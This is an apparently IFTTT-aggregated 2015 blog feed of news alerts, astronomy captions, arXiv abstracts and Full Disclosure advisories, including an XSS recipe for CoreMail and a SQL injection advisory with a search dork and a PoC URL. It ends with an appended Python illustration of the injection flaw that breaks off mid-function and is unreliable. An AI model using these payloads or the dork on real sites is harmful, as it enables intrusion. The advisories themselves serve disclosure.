
Saturday, November 28, 2015

Make Anonymous Grading notification in Grades section a Feature Option

I can understand in certain situations it is good to know your grade was given in an anonymous setting. I can also see how that information would be ...

from Google Alert - anonymous http://ift.tt/1RdOz2M
via IFTTT

I have a new follower on Twitter


Marcus Biel
Software Craftsman, Trainer, Speaker, Clean Code Activist, Java addict. #refugeeswelcome
Munich, Germany
https://t.co/ozscglwSVn
Following: 3010 - Followers: 12034

November 28, 2015 at 10:27AM via Twitter http://twitter.com/MarcusBiel

[FD] Visual Paradigm Server v10.0 - Cross Site Scripting (XSS)

================================================================
Visual Paradigm Server v10.0 - Cross Site Scripting (XSS)
================================================================
Information

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Google Translator affected by Cross-Site Scripting vulnerability

Hi Francisco,

Unfortunately your disclosure is factually wrong. Please note that even the packet you are citing says "Host: translate.googleusercontent.com" - this is not the same domain as translate.google.es (or translate.google.com), therefore, due to the JavaScript same-origin policy (http://ift.tt/1k9Orkx) it's a different origin. Which means that scripts executed from translate.googleusercontent.com do not have access to cookies/DOM/etc of Google Translate main domains (translate.google.es, etc). And there are no interesting cookies / things to do on translate.googleusercontent.com.

Given the above, as Google surely told you, you didn't find an XSS in Google Translate, you found an XSS in a sandbox domain, which was designed to allow execution of potentially hostile JavaScript code. Hey, you even can find the *.googleusercontent.com domain in Google's sandboxed domain listing: http://ift.tt/1IfJnK3

Keep in mind that when doing XSS-related security research a popping out alert box tells you that you can execute code, but not if it's a vulnerability - for that you need to verify the domain (and maybe schema/port as well, depending on your case), e.g. by doing alert(document.domain) instead of alert('XSS en Google AUDIT') ;)

Cheers,
Gynvael

On Fri, Nov 27, 2015 at 10:28 AM Francisco Javier Santiago Vázquez <franciscojaviersantiagovazquez@gmail.com> wrote:
> I. VULNERABILITY
>

Source: Gmail -> IFTTT-> Blogger

[FD] BlackArch Linux: New ISOs and Guide released

Gravity's Grin


Albert Einstein's general theory of relativity, published 100 years ago this month, predicted the phenomenon of gravitational lensing. And that's what gives these distant galaxies such a whimsical appearance, seen through the looking glass of X-ray and optical image data from the Chandra and Hubble space telescopes. Nicknamed the Cheshire Cat galaxy group, the group's two large elliptical galaxies are suggestively framed by arcs. The arcs are optical images of distant background galaxies lensed by the foreground group's total distribution of gravitational mass dominated by dark matter. In fact the two large elliptical "eye" galaxies represent the brightest members of their own galaxy groups which are merging. Their relative collisional speed of nearly 1,350 kilometers/second heats gas to millions of degrees producing the X-ray glow shown in purple hues. Curiouser about galaxy group mergers? The Cheshire Cat group grins in the constellation Ursa Major, some 4.6 billion light-years away. via NASA http://ift.tt/1HskNFu

Friday, November 27, 2015

Anonymous white

... Dictionaries & Language Packs · Search Tools · Developer Hub · Add-ons for Firefox · Themes; Anonymous white. Anonymous white. by Randy ...

from Google Alert - anonymous http://ift.tt/1SooSeq
via IFTTT

CDN distribution does an anonymous define in AMD environments, causing errors

CDN distribution does an anonymous define in AMD environments, causing errors #92. Open. nicolasv opened this Issue an hour ago · 1 comment ...

from Google Alert - anonymous http://ift.tt/1NztHna
via IFTTT

Anonymous: 'Sto core mio se fusse de diamante

News · Frequently Asked Questions · Home · Lasso et al.: Canzoni villanesche and Villanelle; Anonymous: 'Sto core mio se fusse de diamante ...

from Google Alert - anonymous http://ift.tt/1PhfFH6
via IFTTT

I have a new follower on Twitter


MyNewNFLJerseyfetish
The three bird mascots of the Baltimore Ravens are named Edgar, Allan and Poe. Tap the Hyperlink below to get your favored NFL Jersey This Second.
Angleton, TX
https://t.co/60zkfE6Knq
Following: 2752 - Followers: 1017

November 27, 2015 at 02:08PM via Twitter http://twitter.com/MyNewNFLJersey

I have a new follower on Twitter


FredLandis
Cloud Alliance Marketer and Strategist

http://t.co/SNVDzhMM4N
Following: 6529 - Followers: 7428

November 27, 2015 at 01:06PM via Twitter http://twitter.com/flandis

I have a new follower on Twitter


Thom Wall
Former geek enabler, but now realised am infact a Geek! Replica Prop & Costume Artist, Cosplayer, Events Organizer, Cat and Dinosaur enthusiast.
Glasgow
http://t.co/sUVolCoO3T
Following: 3008 - Followers: 4952

November 27, 2015 at 01:06PM via Twitter http://twitter.com/SorenzoProps

Ravens: A lot has changed since Dec. 30, 2007, the last time a QB not named Joe Flacco started for Baltimore - Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous jobs

View details & apply online for jobs at Anonymous. Find your ideal job on reed.co.uk, the UK's #1 job site.

from Google Alert - anonymous http://ift.tt/1kXmQaz
via IFTTT

Millions of IoT Devices Using Same Hard-Coded CRYPTO Keys

Millions of embedded devices, including home routers, modems, IP cameras, VoIP phones, are sharing the same hard-coded SSH (Secure Shell) cryptographic keys or HTTPS (HTTP Secure) server certificates that expose them to various types of malicious attacks. A new analysis by IT security consultancy SEC Consult shows that the lazy manufacturers of the Internet of Things (IoTs) and Home


from The Hacker News http://ift.tt/1kXf5Sa
via IFTTT

ISS Daily Summary Report – 11/25/15

Robonaut 2 Troubleshooting: Lindgren continued troubleshooting Robonaut’s Compact Peripheral Component Interface today. Robonaut 2 is a two-armed humanoid robot designed with the versatility and dexterity to manipulate hardware, work in high risk environments, and respond safely to unexpected obstacles. Robonaut is currently mounted inside the ISS. In the future, it will perform tasks both inside and outside the ISS.

Veggie (Veg-01): Kelly refilled the Veg-01 plant pillows with water. The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility. For this run, Zinnias will be grown for 60 days and are expected to produce flowers.

Biological Rhythms 48 Hours: At the end of his work day Lindgren removed the Holter Electrocardiogram and transferred data from the Holter and Actiwatch to the Medical laptop. This investigation studies the effects of long-term microgravity exposure on heart function by analyzing an astronaut’s electrocardiogram for 48 hours. While the ISS schedule follows Greenwich Mean Time (GMT), it is not known whether a separate biological rhythm is imposed on long-term flight crews. To study this, astronauts wear an Actiwatch for 96 hours and a Holter electrocardiograph for 48 hours.

Haptics-1: Yui set up equipment and performed experiment protocols for the rack-mounted configuration of European Space Agency’s (ESA’s) Haptics-1 investigation. The Haptics-1 experiment is performed in two different configurations to evaluate hardware and human performance under varying mounting conditions: wall-mounted on rack seat tracks and body-mounted in a vest assembly. Haptics-1 supports analysis of engineering parameters and the merits of body-grounded versus non-body grounded force feedback to a crewmember within a microgravity environment. The physiological property analysis will identify changes in human kinesthetic perception and performance in position and force-torque control tasks and in cognitive performance.

Mouse Habitat Unit (MHU): Yui installed the spare MHU Interface Unit in the Cell Biology Experiment Facility (CBEF) for checkout. He then installed spare MHU cages into the CBEF for a ground commanded checkout.

Cognition: Kornienko performed his Flight Day 233 session of the Cognition experiment today. The Individualized Real-Time Neurocognitive Assessment Toolkit for Space Flight Fatigue (Cognition) investigation is a battery of tests that measure how spaceflight-related physical changes, such as microgravity and lack of sleep, can affect cognitive performance. Cognition includes ten brief computerized tests that cover a wide range of cognitive functions, and provides immediate feedback on current and past test results. The software used allows for real-time measurement of cognitive performance while in space.

44 Soyuz (44S) Emergency Egress Drill: The 44S Crew (Kelly, Volkov, and Kornienko) participated in an emergency descent drill. This training session focuses on off-nominal procedures that would be used in the event the crew needs to egress the ISS and perform an emergency descent. The drill is scheduled when the crew has been aboard the ISS for 12-14 weeks, then once every 2.5 months.

Port Thermal Radiator Rotary Joint (TRRJ) Survey: Kelly configured a D4 Camera in order to perform a periodic imagery survey of the port TRRJ from the Docking Compartment 1 window. During this task, the Radiator was rotated to two different angles to photograph both sides of the TRRJ. This survey is conducted yearly for data gathering purposes.

ISS Reboost: This afternoon the ISS performed a reboost using 61 Progress (61P) thrusters. Delta-V was 1.946 meters/second, burn duration was 15 minutes 32.8 seconds.
This reboost sets up conditions for the 43S landing on December 11 and the 45S 4-orbit rendezvous on December 15.   Today’s Planned Activities All activities were completed unless otherwise noted. Body Mass Measurement МО-8. Closeout Ops Ultrasound 2 – Hardware Activation Soyuz 718 Samsung Tablet Charge – start SSIPC FD Conference Ultrasound 2 – Scanning Verification of ИП-1 Flow Sensor Position Private Psychological Conference Water Recovery System (WRS) Drain Waste Water Tank, initiate CBEF – Hardware Setup Ultrasound 2 – Data Export Recording Greetings Video Ultrasound 2 – Closeout Ops On-board Training (OBT) Cygnus Rendezvous Review [Aborted] BIOCARD. Experiment Ops Water Recovery System (WRS) Drain Waste Water Tank, terminate HRF – Hardware Setup HAP1 – Activation HAM radio session from Columbus [Aborted] HAP1 Experiment Ultrasound 2 – Deactivation and Stowage ISS Emergency Descent OBT Surface sampling from FGB equipment and structures HAP1 Photography Eye Examination HAP1 Experiment TV Conference with Students and Teachers of Know-How Language Center Robonaut Node2 Camcorder Video Setup Setup camcorder in Lab for Robonaut VEG-01 – Refilling Root Mat with Water Preventive Maintenance of FS1 Laptop (Cleaning and rebooting) СОЖ Maintenance Surface samples from FGB equipment and structures R2 Experiment BRI Cleaning Private Psychological Conference HAP1 Experiment Video Footage for Roscosmos TV Studio Photo Camera Setup for Radiator Inspection P1 Radiator Imagery from DC1 window, Part 1 HAP1 – Hardware Stowage Download Photos and Return Camera to Nominal Setup Configuration ARED Quarterly Maintenance HMS – OCT Hardware Stow IMS Delta File Prep Soyuz 718 Samsung tablet charging – end SPRINT Exercise NAPOR-miniRSA. Cleaning БЗУ-М vents Closing USOS Window Shutters Closing window 6,8,9,12,13,14 shutters R2 – Hardware Deactivation and Stowage CONTENT. 
Experiment Ops BLR48 – Saving Experiment Data Evening Work Prep WRS – Recycle Tank Fill BLR48 – Saving Actiwatch Data COGNITION – Experiment Ops Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observations and Photography URAGAN Observations and Photography Installation of inserts to ease opening of SM interior panel locks   Completed Task List Items LHA JPM1OF3 R&R   Ground Activities All activities were completed unless otherwise noted. ISS Reboost   Three-Day Look Ahead: Thursday, 11/26: Crew Holiday Friday, 11/27:  RRM Transfer Cage Install, HAPTICS-1 Ops, Crew Departure Prep, Stbd CQ Cleaning, IMAX File D/L Saturday, 11/28:  Weekly Cleaning, Crew Off Duty   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab […]

from ISS On-Orbit Status Report http://ift.tt/1LDhc2s
via IFTTT

Critical 'Port Fail' Vulnerability Reveals Real IP Addresses of VPN Users

A newly discovered flaw affecting all VPN protocols and operating systems has the capability to reveal the real IP-addresses of users' computers, including BitTorrent users, with relative ease. The vulnerability, dubbed Port Fail by VPN provider Perfect Privacy (PP) who discovered the issue, is a simple port forwarding trick and affects those services that: Allow port forwarding Have no


from The Hacker News http://ift.tt/1lkZUBE
via IFTTT

[FD] PRTG Network Monitor Tool – Multiple Cross-Site Scripting Vulnerability

================================================================
PRTG Network Monitor Tool – Multiple Cross-Site Scripting Vulnerability
================================================================
Information

Source: Gmail -> IFTTT-> Blogger

[FD] Mitigations for "carpet bombing" alias "directory poisoning" attacks against executable installers

ISIS page hacked, replaced with Viagra ad. Anonymous group hopes Islamic State will rise up and ...

Undoubtedly, the amount of beheadings is bound to plummet now! I believe the average farker could deliver a better laugh line than anonymous.

from Google Alert - anonymous http://ift.tt/1lkXFhL
via IFTTT

[FD] [CVE-2015-6942] CoreMail XT3.0 Stored XSS

Application: CoreMail
Versions Affected: XT3.0
Vendor URL: http://www.coremail.cn/
Bugs: Stored XSS
Author: shack.li (DBAPPSecurity Ltd)

Description: Coremail mail system was born in 1999, is widely used in network operators, large enterprises, government institutions, colleges and universities and other mail systems, so far, the user has more than 700000000, the official website.

Create a document, insert a hyperlink, hyperlink for executing the JavaScript test code "javascript:alert ()". Then create a mail and upload attachments, and then send them to the other users who need them. When other users online preview documents, click the hyperlink, Attack code will be executed

step one:

step two:

Source: Gmail -> IFTTT-> Blogger

[FD] Google Translator affected by Cross-Site Scripting vulnerability

I. VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

How to Root Windows Phone and Unlock the Bootloader to Install Custom ROMs

Yes, now it is possible to unlock a Windows Lumia Phone for Root Access and run custom ROMs. Both Microsoft as well as Nokia have made Windows Lumia smartphones difficult to break into at a low-level by locking down their bootloaders, but a software hacker, who goes by the name HeathCliff, has just proven that it is not impossible. HeathCliff has released an excellent tool called "


from The Hacker News http://ift.tt/1Yxdoc5
via IFTTT

Planets of the Morning


Planet Earth's horizon stretches across this recent Solar System group portrait, seen from the southern hemisphere's Las Campanas Observatory. Taken before dawn it traces the ecliptic with a line-up familiar to November's early morning risers. Toward the east are bright planets Venus, Mars, and Jupiter as well as Regulus, alpha star of the constellation Leo. Of course the planets are immersed in the faint glow of zodiacal light, visible from the dark site rising at an angle from the horizon. Sometimes known as the false dawn, it's no accident the zodiacal light and planets both lie along the ecliptic. Formed in the flattened protoplanetary disk, the Solar System's planets all orbit near the ecliptic plane, while dust near the plane scatters sunlight, the source of the faint zodiacal glow. via NASA http://ift.tt/1NvB8f9

Thursday, November 26, 2015

'Swede' Hanson impacted thousands of lives but stayed largely anonymous

Over and over, he poured coffee and spoke at countless Alcoholics Anonymous meetings he started, led or attended in southern Colorado.

from Google Alert - anonymous http://ift.tt/1OjqvLa
via IFTTT

Anonymous

Anonymous. 1800092 likes · 21125 talking about this. We are Anonymous, We are Legion. We do not forgive. We do not forget. Expect us.

from Google Alert - anonymous http://ift.tt/1MGOVfi
via IFTTT

Ocean City, MD's surf is at least 5.32ft high

Maryland-Delaware, December 01, 2015 at 08:00AM

Ocean City, MD Summary
At 2:00 AM, surf min of 4.92ft. At 8:00 AM, surf min of 5.32ft. At 2:00 PM, surf min of 3.2ft. At 8:00 PM, surf min of 3.28ft.

Surf maximum: 5.78ft (1.76m)
Surf minimum: 5.32ft (1.62m)
Tide height: 1.62ft (0.49m)
Wind direction: ESE
Wind speed: 9.17 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Anonymous Reporting

To facilitate the anonymous reporting, American AgCredit has engaged a third party vendor, EthicsPoint a division of NAVEX Global, to facilitate the ...

from Google Alert - anonymous http://ift.tt/1PcAu6t
via IFTTT

Live at Santas Anonymous 3

Live at Santas Anonymous 3. ... Ho ho ho! Our Bridget Ryan is impersonating the big guy down at Santas Anonymous with a lot of other good people.

from Google Alert - anonymous http://ift.tt/1OtBvUv
via IFTTT

Anonymous hacks Isis, replaces propaganda with drugs ads

Anonymous hacks Isis, replaces propaganda with drugs ads. The hackers have taken down a site on the darkweb and replaced its homepage with a ...

from Google Alert - anonymous http://ift.tt/1PcpINt
via IFTTT

Li-Fi is 100 times Faster than Wi-Fi Technology: Real-World Tests Prove

Yes, it's time to shift from Wi-Fi to Li-Fi — an alternative technology that is 100 times faster than the average speeds of Wi-Fi. Scientists have just field-tested the new wireless technology called Li-Fi for the first time and achieved marvelous wireless speeds that are 100 times faster than current WiFi speeds. What is Li-Fi Technology? Li-Fi is a new wireless technology that


from The Hacker News http://ift.tt/1N9L47v
via IFTTT

Raspberry Pi Zero — The $5 Tiny Computer is Here

Get ready for a Thanksgiving celebration from the Raspberry Pi Foundation. Raspberry Pi, the charitable foundation behind the United Kingdom's best-selling computer, has just unveiled its latest wonder – the Raspberry Pi Zero. Raspberry Pi Zero is a programmable computer that costs just $5 (or £4) and may rank as the world's cheapest computer. Raspberry Pi Zero: Just $5


from The Hacker News http://ift.tt/1Ij5QR8
via IFTTT

Hackers are using Nuclear Exploit Kit to Spread Cryptowall 4.0 Ransomware

Beware Internet Users! Cryptowall 4.0 – the newest version of the world's worst Ransomware – has surfaced in the Nuclear exploit kit, one of the most potent exploit kits available in the underground market for hacking into computers. Ransomware threat has emerged as one of the biggest threats to internet users in recent times. Typically, a Ransomware malware encrypts all files on


from The Hacker News http://ift.tt/1Xi29aw
via IFTTT

Mr. Grey Hacker (Wanted by FBI) Steals 1.2 BILLION Login Passwords

That's a lot of Login credentials fetched by a single hacker. The FBI believes a single hacker who goes by the moniker Mr.Grey has stolen login credentials for over 1.2 Billion online accounts – apparently the biggest heist of log-in credentials the FBI has investigated thus far. Yeah, that's not Fifty, but 1.2 Billion Shades of Grey. The information came from the court


from The Hacker News http://ift.tt/1jkYhCG
via IFTTT

Unusual Pits Discovered on Pluto


Why are there unusual pits on Pluto? The indentations were discovered during the New Horizons spacecraft's flyby of the dwarf planet in July. The largest pits span a kilometer across and dip tens of meters into a lake of frozen nitrogen, a lake that sprawls across Sputnik Planum, part of the famous light-colored heart-shaped region named Tombaugh Regio. Although most pits in the Solar System are created by impact craters, these depressions look different -- many are similarly sized, densely packed, and aligned. Rather, it is thought that something has caused these specific areas of ice to sublimate and evaporate away. In fact, the lack of overlying impact craters indicates these pits formed relatively recently. Even though the robotic New Horizons is now off to a new destination, it continues to beam back to Earth new images and data from its dramatic encounter with Pluto. via NASA http://ift.tt/1QHXIRV

Wednesday, November 25, 2015

Live at Santas Anonymous 2

Ho ho ho! Our Bridget Ryan is impersonating the big guy down at Santas Anonymous with a lot of other good people.

from Google Alert - anonymous http://ift.tt/1NQ59k4
via IFTTT

I have a new follower on Twitter


Shinedowns Nation
Shinedowns Nation - A @Shinedown Fan Page. New album 'Threat To Survival' is out now! Get your copy here: https://t.co/uHsbb4qPYZ
Shinedown Nation
http://t.co/rS31qutFo0
Following: 117126 - Followers: 115226

November 25, 2015 at 11:52PM via Twitter http://twitter.com/Shinedown_Fans

Learning with Memory Embeddings. (arXiv:1511.07972v1 [cs.AI])

Embedding learning, a.k.a. representation learning, has been shown to be able to model large-scale semantic knowledge graphs. A key concept is a mapping of the knowledge graph to a tensor representation whose entries are predicted by models using latent representations of generalized entities. In recent publications the embedding models were extended to also consider temporal evolutions, temporal patterns and subsymbolic representations. These extended models were used successfully to predict clinical events like procedures, lab measurements, and diagnoses. In this paper, we attempt to map these embedding models, which were developed purely as solutions to technical problems, to various cognitive memory functions, in particular to semantic and concept memory, episodic memory and sensory memory. We also make an analogy between a predictive model, which uses entity representations derived in memory models, to working memory. Cognitive memory functions are typically classified as long-term or short-term memory, where long-term memory has the subcategories declarative memory and non-declarative memory and the short term memory has the subcategories sensory memory and working memory. There is evidence that these main cognitive categories are partially dissociated from one another in the brain, as expressed in their differential sensitivity to brain damage. However, there is also evidence indicating that the different memory functions are not mutually independent. A hypothesis that arises out of this work is that mutual information exchange can be achieved by sharing or coupling of distributed latent representations of entities across different memory functions.



from cs.AI updates on arXiv.org http://ift.tt/1NdF4iH
via IFTTT

Strategic Dialogue Management via Deep Reinforcement Learning. (arXiv:1511.08099v1 [cs.AI])

Artificially intelligent agents equipped with strategic skills that can negotiate during their interactions with other natural or artificial agents are still underdeveloped. This paper describes a successful application of Deep Reinforcement Learning (DRL) for training intelligent agents with strategic conversational skills, in a situated dialogue setting. Previous studies have modelled the behaviour of strategic agents using supervised learning and traditional reinforcement learning techniques, the latter using tabular representations or learning with linear function approximation. In this study, we apply DRL with a high-dimensional state space to the strategic board game of Settlers of Catan, where players can offer resources in exchange for others and they can also reply to offers made by other players. Our experimental results report that the DRL-based learnt policies significantly outperformed several baselines including random, rule-based, and supervised-based behaviours. The DRL-based policy has a 53% win rate versus 3 automated players ('bots'), whereas a supervised player trained on a dialogue corpus in this setting achieved only 27%, versus the same 3 bots. This result supports the claim that DRL is a promising framework for training dialogue systems, and strategic agents with negotiation abilities.



from cs.AI updates on arXiv.org http://ift.tt/1T5BkzT
via IFTTT

A Roadmap towards Machine Intelligence. (arXiv:1511.08130v1 [cs.AI])

The development of intelligent machines is one of the biggest unsolved challenges in computer science. In this paper, we propose some fundamental properties these machines should have, focusing in particular on communication and learning. We discuss a simple environment that could be used to incrementally teach a machine the basics of natural-language-based communication, as a prerequisite to more complex interaction with human users. We also present some conjectures on the sort of algorithms the machine should support in order to profitably learn from the environment.



from cs.AI updates on arXiv.org http://ift.tt/1T5BmI2
via IFTTT

Improving Decision Trees Using Tsallis Entropy. (arXiv:1511.08136v1 [stat.ML])

The construction of efficient and effective decision trees remains a key topic in machine learning because of their simplicity and flexibility. A lot of heuristic algorithms have been proposed to construct near-optimal decision trees. Most of them, however, are greedy algorithms which have the drawback of obtaining only local optimums. Besides, common split criteria, e.g. Shannon entropy, Gain Ratio and Gini index, are also not flexible due to lack of adjustable parameters on data sets. To address the above issues, we propose a series of novel methods using Tsallis entropy in this paper. Firstly, a Tsallis Entropy Criterion (TEC) algorithm is proposed to unify Shannon entropy, Gain Ratio and Gini index, which generalizes the split criteria of decision trees. Secondly, we propose a Tsallis Entropy Information Metric (TEIM) algorithm for efficient construction of decision trees. The TEIM algorithm takes advantages of the adaptability of Tsallis conditional entropy and the reducing greediness ability of two-stage approach. Experimental results on UCI data sets indicate that the TEC algorithm achieves statistically significant improvement over the classical algorithms, and that the TEIM algorithm yields significantly better decision trees in both classification accuracy and tree complexity.



from cs.AI updates on arXiv.org http://ift.tt/1R7ieuG
via IFTTT

Plan Explainability and Predictability for Cobots. (arXiv:1511.08158v1 [cs.AI])

Robots are becoming pervasive in human populated environments. A desirable capability of these robots (cobots) is to respond to goal-oriented commands by autonomously constructing plans. However, such autonomy can add significant cognitive load and even potentially introduce safety risks to the humans when robots choose their plans unexpectedly. As a result, for cobots to be more helpful, one important requirement is for them to synthesize plans that do not surprise the humans. While there are previous works that studied socially acceptable robots which discuss "natural ways" for cobots to interact with humans, there still lacks a general solution, especially for cobots that can construct their own plans. In this paper, we introduce the notions of plan explainability and predictability. To compute these measures, first, we postulate that humans understand robot plans by associating high level tasks with robot actions, which can be considered as a labeling process. We learn the labeling scheme of humans for robot plans from training examples using conditional random fields (CRFs). Then, we use the learned model to label a new plan to compute its explainability and predictability. These measures can be used by cobots to proactively choose plans, or directly incorporated into the planning process to generate plans that are more explainable and predictable. We provide an evaluation on a synthetic dataset to demonstrate the effectiveness of our approach.



from cs.AI updates on arXiv.org http://ift.tt/1XgW5iu
via IFTTT

Building End-To-End Dialogue Systems Using Generative Hierarchical Neural Network Models. (arXiv:1507.04808v2 [cs.CL] UPDATED)

We investigate the task of building open domain, conversational dialogue systems based on large dialogue corpora using generative models. Generative models produce system responses that are autonomously generated word-by-word, opening up the possibility for realistic, flexible interactions. In support of this goal, we extend the recently proposed hierarchical recurrent encoder-decoder neural network to the dialogue domain, and demonstrate that this model is competitive with state-of-the-art neural language models and back-off n-gram models. We investigate the limitations of this and similar approaches, and show how its performance can be improved by bootstrapping the learning from a larger question-answer pair corpus and from pretrained word embeddings.



from cs.AI updates on arXiv.org http://ift.tt/1ea3dHX
via IFTTT

Identification by Auxiliary Instrumental Sets in Linear Structural Equation Models. (arXiv:1511.02995v2 [stat.ME] CROSS LISTED)

We extend graph-based identification methods for linear models by allowing background knowledge in the form of externally evaluated parameters. Such information could be obtained, for example, from a previously conducted randomized experiment, from substantive understanding of the domain, or even from another identification technique. To incorporate such information systematically, we propose the addition of auxiliary variables to the model, which are constructed so that certain paths will be conveniently cancelled. This cancellation allows the auxiliary variables to help conventional methods of identification (e.g., single-door criterion, instrumental variables, half-trek criterion) and model testing (e.g., d-separation, over-identification). Moreover, by iteratively alternating steps of identification and adding auxiliary variables, we can improve the power of existing identification and model testing methods, even without additional knowledge. We operationalize this general approach for instrumental sets (a generalization of instrumental variables) and show that the resulting procedure subsumes the most general identification method for linear systems known to date. We further discuss the application of this new operation in the tasks of model testing and z-identification.



from cs.AI updates on arXiv.org http://ift.tt/1OD10FS
via IFTTT

[anonymous_publishing] Anonymous publishing

Summary Anonymous publishing may lower the threshold for authorship and entry to a site. It may also be a requirement for certain sites that deal ...

from Google Alert - anonymous http://ift.tt/1IhwTMC
via IFTTT

Anonymous resident pays for firefighters' groceries

VANDALIA, Ohio Firefighters who had to leave a grocery store for a medical call came back to find someone had paid for their groceries.

from Google Alert - anonymous http://ift.tt/1HnQ50m
via IFTTT

I have a new follower on Twitter


RANN

Brooklyn, NY
https://t.co/tgpQ1hGX6R
Following: 3915 - Followers: 3118

November 25, 2015 at 02:25PM via Twitter http://twitter.com/rannpage

"Anonymous" Could Derail Government Attempts to Target ISIS

Anonymous is one such group whose level of public support continues to climb ... Affectionately labeled “hacktivists,” Anonymous strives to uncover ...

from Google Alert - anonymous http://ift.tt/1SkNapJ
via IFTTT

Chile FF president in Miami after resigning amid FIFA probe

SANTIAGO, Chile (AP) The whereabouts of the former president of Chile's soccer federation has been solved.

from FOX Sports Digital http://ift.tt/1OgGFoK
via IFTTT

[FD] CIS Manager Content Management System 2015Q4 - SQL Injection Vulnerability

Document Title:
===============
CIS Manager Content Management System 2015Q4 - SQL Injection Vulnerability

References (Source):
====================
http://ift.tt/21fTlBj

Release Date:
=============
2015-11-25

Vulnerability Laboratory ID (VL-ID):
====================================
1652

Common Vulnerability Scoring System:
====================================
8.3

Product & Service Introduction:
===============================
The Constructive Internet Software through a team of qualified professionals have skills to offer the best solution for your company in the digital world. Check the main services offered. Consulting and planning of actions and projects using digital technologies and media oriented Internet (websites, portals, e-commerce, web-based systems), mobile technology (mobile), social networking and search engine marketing. We seek the desired result by our customers, through a detailed and accurate survey of requirements. Architecture, design and development of applications and systems using web and mobile technologies seeking to meet the precise planning of digital actions. Learn about the technologies that are in our abilities.

(Copy of the Vendor Homepage: http://ift.tt/1IgEz1z )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote sql injection web vulnerability in the official CIS Manager Content Management System.

Vulnerability Disclosure Timeline:
==================================
2015-11-24: Report to Vulnerability Lab (Sajjad Sotoudeh - White-hg)
2015-11-25: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Construtiva
Product: CIS Manager - Content Management System (Web-Application) 2015 Q4

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official CIS Content Management System 2015-Q4. The vulnerability allows remote attackers to execute own sql commands to compromise the web-application or connected dbms.

The vulnerability is located in the `TroncoID` value of the `default.php` file. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable TroncoID parameter. The request method to inject the sql command is GET and the issue is located on the application-side of the `./site/` online-service path. The sql vulnerability allows remote attackers to compromise the database management system that is connected to the web-application. The issue is a classic order-by sql injection issue.

The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.3. Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./site/

Vulnerable File(s):
[+] default.asp

Vulnerable Parameter(s):
[+] TroncoID

Proof of Concept (PoC):
=======================
The sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Dork(s):
intext:"Powered by CIS Manager"

PoC:
http://localhost:8000/site/default.asp?TroncoID=[SQL-INJECTION VULNERABILITY!]

Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the id parameter value is estimated as high. (CVSS 8.3)

Credits & Authors:
==================
Sajjad Sotoudeh - (http://www.y-r-s.net & www.white-hg.com) [http://ift.tt/21fTlBl]
We are: KamraN HellisH - Dr.RooT - Dr.Repermind - Milad_Inj3ct0r - 4li-3ndG & All white-hg members

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
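The bug class this advisory reports, a numeric GET parameter concatenated into the SQL text, shown next to a hardened form. This is an added illustration in Python with an in-memory SQLite table, not CIS Manager code: the table `tronco`, its columns, the `sort` parameter and all function names are assumptions, and only the parameter name `TroncoID` comes from the advisory. It goes one step beyond the advisory by also covering a sort column, which cannot be bound as a placeholder and needs an allowlist instead.

```python
import sqlite3


class BadRequest(ValueError):
    """Raised when a request parameter fails validation (map to HTTP 400)."""


def make_db():
    """Constructed sample data standing in for the CMS content table."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE tronco (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)"
    )
    db.executemany(
        "INSERT INTO tronco (id, title, published) VALUES (?, ?, ?)",
        [(1, "Home", 1), (2, "Services", 1), (3, "Draft: pricing", 0)],
    )
    return db


def fetch_vulnerable(db, tronco_id):
    """Vulnerable pattern: the raw query-string value becomes part of the SQL."""
    sql = "SELECT id, title FROM tronco WHERE published = 1 AND id = " + tronco_id
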